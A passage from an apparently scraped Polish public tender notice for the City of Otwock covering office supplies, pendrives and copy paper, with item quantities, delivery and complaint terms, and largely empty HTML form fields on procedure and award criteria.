Super Grip )	szt.	50 szt.86	Pióro Korpus i skuwka wykonane z chromowanej stali	szt.	4 szt.87	Naboje w kolorze niebieskim do pióra (typu Waterman )pakowane po 8 szt.	opakowanie(8 sztuk )	5 op.88	Naboje w kolorze czarnym do pióra (typu Waterman ) pakowane po 8 szt.	opakowanie(8 sztuk )	5 op.89	Wkłady niebieskie do długopisów (typu Waterman)	szt.	5 szt.90	Wkłady czarne do długopisów ( typu Waterman )	szt.	5 szt.91	Tusz do stempli 25 ml różne kolory	szt.	10 szt.92	Taśma odblaskowa biało-czerwona 500m	szt.	20 szt.93	Etykiety biurowe samoprzylepne białe o wym. 70 x32 mm opakowanie	5 op.94	Etykiety biurowe samoprzylepne białe o wym. 70 x34 mm opakowanie	5 op.95	Etykiety biurowe samoprzylepne białe o wym. 70 x37 mm opakowanie	5 op.96	Wizytownik biurkowy ( wykonany z krystalicznie przeźroczystego akrylu o wymiarach gł. 45 szer. 110 wys. 55 mm, na 80 wizytówek o standardowym rozmiarze 90x50 mm)	szt.	2 szt.97	Przybornik na biurko (wykonany z krystalicznie przeźroczystego akrylu o wym. dł. 105 szer. 155 wys. 102 mm)	szt.	10 szt.98	Półka na dokumenty (formatu A4, o wym. 340x245x58 mm, wykonana z polistyrenu, nie wymagająca montowania dystanserów podczas ustawiania ‘jednej na drugą”)	szt.	30 szt.99	Składany stojak na katalogi (wykonany z PVC, formatu A4 z wymienna etykietą, szeroki uchwyt na palec, o wymiarach dł. 240 x szer. 100mm x wys. 320mm, różne kolory) szt.	5 szt.100	Tablice korkowe ( w ramie MDF, o wymiarach 60 x 90 cm, w komplecie kołki mocujące)	szt.	5 szt.101	Tablice korkowe ( w ramie MDF, o wymiarach 50 x 100 cm, w komplecie kołki mocujące)	szt.	5 szt.102	Koperty ochronne A-6	szt.	50 szt.103	Segregator A-5 75 mm.	szt.	10 szt.104	Koszulki A-5	op.	10 op.105	Skorowidz alfabetyczny A-4 96 kart.	szt.	10 szt.106	Karton archiwizacyjny na zawartość segregatora szt.	200 szt.107	Koperty DL 110 x 220 z okienkiem z prawej strony	szt.	20 op.108	Skalówka	szt.	5 szt.109	Kątomierz	szt.	5 szt.110	Cyrkiel	szt.	5 szt.111	Kalka ołówkowa	op.	2 op.112	Koszyk plastikowy na pieczątki	szt.	10 szt.113	Zszywki 23/10	szt.	10 op.114	Spinacze krzyżowe	op.	5 op.115	Wąsy do skoroszytów	szt.	5 szt.116	Kalkulator biurowy	szt.	10 szt.117	Kalkulator biurowy Wymiary min. (wys x szer x grub) mm	199 x 153 x 30,50	szt. 10 szt.118	Atrament do piór	szt.	2 op.119	Kredki 24 kolory	op.	5 op.120	Maczałka glicerynowa szt.	5 szt.121	Poduszki do stempli uniwersalne	szt.	5 szt.122	Składany pojemnik na dokumenty A-4	szt.	20 szt.123	Długopis zwykły niebieski	szt. 200 szt.124	Teczka skrzydłowa na rzepy 15 cm	szt.	10 szt.125	Teczka skrzydłowa na rzepy 40 cm	szt.	10 szt.126	Teczka z rączką 5 cm	szt.	10 szt.127	Teczka sztywna skóropodobna „Akta osobowe” 250 x 15	szt.	50 szt.128	Wizytownik obrotowy chromowany szt.	2 szt.129	Folia do laminowania A-3	szt.	5 op.130	Folia do laminowania A-4	szt.	5 op.131	Folia do laminowania A-5	szt.	5 op.132	Karton do bindowania brązowy A-4	szt.	5 op.133	Karton do bindowania niebieski A-4	szt.	5 op.134	Karton do bindowania zielony A-4	szt.	5 op.135	Karton do bindowania czarny A-4	szt.	5 op.136	Folia bezbarwna do bindowania A-4	szt.	5 op.137	Karton biały do bindowania A-4	szt.	5 op. 138	Tusz do pieczątek żelowy MODICO – czerwony 60 ml	Szt.	10 szt.139	Wizytownik na 200 wizytówek	szt.	5 szt.140	Taśma przezroczysta szeroka 50mm	szt.	20 szt.141	Pióro kulkowe	szt	6 szt.142	Naboje do pióra kulkowego niebieskie	szt.	20 szt.143	Teczki wiązane białe z kartonu bezkwasowego A-4 320-250x35 szt.	200 szt.Lp. Artykuły komputerowe	Jednostka miary	Szacunkowa ilość144	Płyty CD-RW – w op. 10 szt. opakowanie(10 sztuk)	10 op.145	Płyty DVD-R – w op. 10 szt. opakowanie( 10 sztuk)	10 op.146	Pamięć 4 GB (pendrive)	szt.	20 szt.147	Pamięć 8 GB (pendrive)	szt.	20 szt.148	Pamięć 16 GB (pendrive)	szt.	20 szt.Lp.	Artykuły biurowe (papier)	Jednostka miary	Szacunkowa ilość149	Papier A4 biały gr 80g/ m2 (po 500 arkuszy w ryzie ) ( pakowany fabrycznie w opakowania producenta )Parametry Jednostka	WartoścFormat A4Gramatura	g/m2 80±2Wilgotnośc	%	3,8 – 5,0Grubośc	µm	108±3Białośc	CIE	161±2Nieprzezroczystośc	%	≥91Zaklejenie (Cobb60)	g/m2	≤30Przepuszczalnośc powietrza	cm3/min	≤1.250Gładkość	cm3/min	180±50	ryza	700 ryz150	Papier A3 biały gr 80g/ m2 (po 500 arkuszy w ryzie ) (pakowany fabrycznie w opakowania producenta )Parametry Jednostka	WartoścFormat A3Gramatura	g/m2 80±2Wilgotnośc	%	3,8 – 5,0Grubośc	µm	108±3Białośc	CIE	161±2Nieprzezroczystośc	%	≥91Zaklejenie (Cobb60)	g/m2	≤30Przepuszczalność powietrza	cm3/min	≤1.250Gładkość	cm3/min	180±50	ryza	100 ryz151	Papier A4 biały gr 120g/ m2 (po 500 arkuszy w ryzie ) ryza	10 ryz152	Papier A4 80g/ m2 kolory różne pastelowe(po 500 arkuszy w ryzie ) ryza	5 ryz153	Papier A4 fotograficzny 50 ark.	opakowania	5 op.154	Papier do plottera HP Designjet 800 gr 90g/m2 o szerokości 914 mm	rolki	4 rolki155	Papier kukurydziany A-4 żeberkowany, gładki 220 g/m2 25 szt.	opakowania	30 op.a.	Wykonawca zobowiązuje się do sukcesywnej dostawy towaru na podstawie składanych przez Zamawiającego pisemnych zamówień określających ilość i asortyment nabywanych artykułów.b.	Strony ustalają, że miejscem dostarczenia i przekazania artykułów przez Wykonawcę będzie magazyn Zamawiającego mieszczący się w Urzędzie Miasta Otwocka ul. Armii Krajowej 5 budynek C pomieszczenie nr 19.c.	W ramach umowy Wykonawca zobowiązuje się do dostarczania nabywanego przez Zamawiającego towaru do magazynu o którym mowa w ust. 2, w dniach od poniedziałku do piątku w godzinach 9.00 – 14.00, w uzgodnionym terminie nie dłuższym niż 3 dni robocze od daty otrzymania zamówienia złożonego przez Zamawiającego. d.	Zamawiający zobowiązuje się do oceny przedmiotu każdego zamówienia, w sposób zwyczajowo przyjęty, w ciągu 3 dni od daty jego przyjęcia.e.	Reklamacje Zamawiającego dotyczące braków ilościowych lub jakościowych towarów, Wykonawca zobowiązuje się rozpatrzyć w terminie 3 dni od daty ich zgłoszenia przez Zamawiającego. Niedotrzymanie tego terminu jest jednoznaczne z uznaniem reklamacji.f.	Dostawca zobowiązuje się do wymiany wadliwego towaru lub uzupełnienia braków ilościowych w terminie 3 dni roboczych od daty uznania reklamacji.g. Koszty związane z wymianą wadliwego towaru ponosi Wykonawca2.	Zamawiający nie jest zobligowany do zamówienia wskazanych ilości szacunkowych poszczególnych towarów i może zmienić - w zakresie ilości, zmawiać asortyment w ramach przeznaczonych na sfinansowanie zamówienia środków finansowych tj. 20 000,00 zł. brutto.3.	Zamawiający informuje, że tam, gdzie w dokumentacji przetargowej opisał przedmiot zamówienia przez wskazanie znaków towarowych, nazwy producenta, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę, które mogłoby doprowadzić do uprzywilejowania lub wyeliminowania niektórych Wykonawców lub produktów, Zamawiający dopuszcza rozwiązanie równoważne opisywanym, pod warunkiem, że będą one o nie gorszych właściwościach i jakości. Tam, gdzie Zamawiający opisał przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 30 ust. 1 pkt 2 i ust. 3 ustawy Pzp. Zamawiający dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. Wszelkie znaki towarowe, patenty lub pochodzenie użyte w niniejszej dokumentacji przetargowej winny być interpretowane jako definicje standardów i propozycje Zamawiającego, a nie jako nazwy konkretnych rozwiązań mających zastosowanie w dokumentacji przetargowej. Jeżeli w dokumentacji przetargowej użyto nazw producentów urządzeń lub materiałów przy realizacji zamówienia, Zamawiający dopuszcza zastosowanie urządzeń, materiałów i sprzętu innych producentów o parametrach lepszych/nie gorszych niż przedstawione w dokumentacji przetargowej. Innymi słowy jako „równoważne” Zamawiający przyjmuje materiały o parametrach technicznych takich samych lub lepszych w porównaniu z parametrami materiałów wzorcowych przedstawionych w dokumentacji.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30190000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin płatności faktury</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Łączna cena ofertowa brutto (suma cen jednostkowych)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span 